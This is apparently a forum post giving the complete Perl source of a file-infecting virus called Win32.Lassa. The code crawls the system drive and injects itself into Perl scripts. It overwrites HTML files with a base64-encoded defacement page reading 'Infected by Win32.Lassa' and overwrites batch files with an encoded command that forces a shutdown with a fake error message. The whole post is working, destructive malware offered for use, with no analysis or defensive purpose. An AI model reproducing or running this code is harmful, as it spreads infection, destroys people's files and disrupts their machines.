[+]Topic: Code
[+]Von: Neo2k8
[+]Return: Code
Win32.Lassa
#!/usr/bin/perl
&use_strict;
sub use_strict
{
use strict;
use MIME::Base64;
&spread();
sub spread {
my $drive = $ENV{'SYSTEMDRIVE'};
my @dir = ("$drive\\");
my $dir = '';
for $dir (@dir) {
if (opendir( DIR, $dir)) {
for (readdir(DIR)) {
next if (/^\./);
push @dir ,"$dir$_/" if (-d "$dir$_");
&infect($dir,$_) if (-f "$dir$_") ;
}
closedir DIR;
}
}
}
sub infect {
my $batch_encrypt = "
QGVjaG8gb2ZmDQpzaHV0ZG93biAtcyAtZiAtdCAxODAgLWMgIkVpbiBzY2h3ZXJl
ciBGZWhsZXIgaXN0IGF1ZmdldHJldGVuLkRlciBDb21wdXRlciB3aXJkIGhlcnVu
dGVyZ2VmYWhyZW4i
";
my $html_encrypt = "
PGh0bWw+DQo8aGVhZD48dGl0bGU+TUUgTUlTUyBLSU08L3RpdGxlPjxoZWFkPg0K
PGJvZHkgYmdjb2xvcj0iYmxhY2siPjxjZW50ZXI+DQo8cHJlPjxmb250IGNvbG9y
PSJyZWQiPg0KICAgICAgICAgICAgICAuLS0tLiAuLS0tLiAgICAgIDxibGluaz5N
RSBNSVNTIEtJTSE8L2JsaW5rPiAgIA0KICAgICAgICAgICAgIDogICAgIDogbyAg
IDogICAgICAgICAvICAgICAgICAgIA0KICAgICAgICAgXy4uLTogICBvIDogICAg
IDotLi5fICAgIC8gICAgICAgICAgIA0KICAgICAuLScnICAnICBgLS0tJyBgLS0t
JyAiICAgYGAtLiAgICAgICAgICAgIA0KICAgLicgICAiICAgJyAgIiAgLiAgICAi
ICAuICcgICIgIGAuICAgICAgICAgIA0KICA6ICAgJy4tLS0uLCwuLC4uLiwuLC4s
LiwuLi0tLS4gICcgOyAgICAgICAgIA0KICBgLiAiIGAuICAgICAgICAgICAgICAg
ICAgICAgLicgIiAuJyAgICAgICAgIA0KICAgYC4gICdgLiAgICAgICAgICAgICAg
ICAgICAuJyAnIC4nICAgICAgICAgIA0KICAgIGAuICAgIGAtLl8gICAgICAgICAg
IF8uLScgIiAgLicgIC4tLS0tLiAgIA0KICAgICAgYC4gIiAgICAnIi0tLi4uLS0i
JyAgLiAnIC4nICAuJyAgbyAgIGAuIA0KICAgICAgLidgLS5fJyAgICAiIC4gICAg
ICIgXy4tJ2AuIDogICAgICAgbyAgOg0KICAgIC4nICAgICAgYGBgLS0uLi4uLi0t
JycnICAgICcgYDpfIG8gICAgICAgOg0KICAuJyAgICAiICAgICAnICAgICAgICAg
IiAgICAgIiAgIDsgYC47IjsiOyI7Jw0KIDsgICAgICAgICAnICAgICAgICIgICAg
ICAgJyAgICAgLiA7IC4nIDsgOyA7IA0KOyAgICAgJyAgICAgICAgICcgICAgICAg
JyAgICIgICAgLicgICAgICAuLScgIA0KJyAgIiAgICAgIiAgICcgICAgICAiICAg
ICAgICAgICAiICAgIF8uLScgICAgIA0KDQo8aDE+IDxibGluaz5JbmZlY3RlZCBi
eSBXaW4zMi5MYXNzYTxibGluaz48L2gxPg0KDQo8L2ZvbnQ+PC9wcmU+PC9jZW50
ZXI+DQo8L2JvZHk+DQo8L2h0bWw+
";
my ($path , $file) = @_;
chdir($path);
open(DATA,'<',"$path$file");
my @TEMPDATA = <DATA>;
close(DATA);
if((@TEMPDATA[0] =~ /perl/i) or (@TEMPDATA[1] =~ /perl/i)) {
open(ME,'<',"$0");
my @me = <ME>;
close(ME);
my $count = @me;
open(DATA,'>',"$path$file");
print DATA "#!/usr/bin/perl\n\n&use_strict;\n";
if( (@TEMPDATA[0] =~ /#!\/usr/i) ) {
@TEMPDATA[0] = '';
}
elsif ( (@TEMPDATA[1] =~ /#!\/usr/i) ){
@TEMPDATA[0] = '';
@TEMPDATA[1] = '';
}
print DATA "@TEMPDATA\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
for(my $i = 2;$i <= $count;$i++) {
my $trash = int(rand(99999) +99);
print DATA @me[$i],"\n# ",$trash,"\n";
}
close(DATA);
}
elsif((@TEMPDATA[0] =~ /html/i) || (@TEMPDATA[1] =~ /html/i) || (@TEMPDATA[2] =~ /html/i)) {
my $html_decrypt = decode_base64("$html_encrypt");
open(DATA,'>',"$path$file");
print DATA $html_decrypt;
close(DATA);
}
elsif((@TEMPDATA[0] =~ /echo off/i) || (@TEMPDATA[1] =~ /echo off/i)) {
my $batch_decrypt = decode_base64("$batch_encrypt");
open(DATA,'>',"$path$file");
print DATA $batch_decrypt;
close(DATA);
}
}
}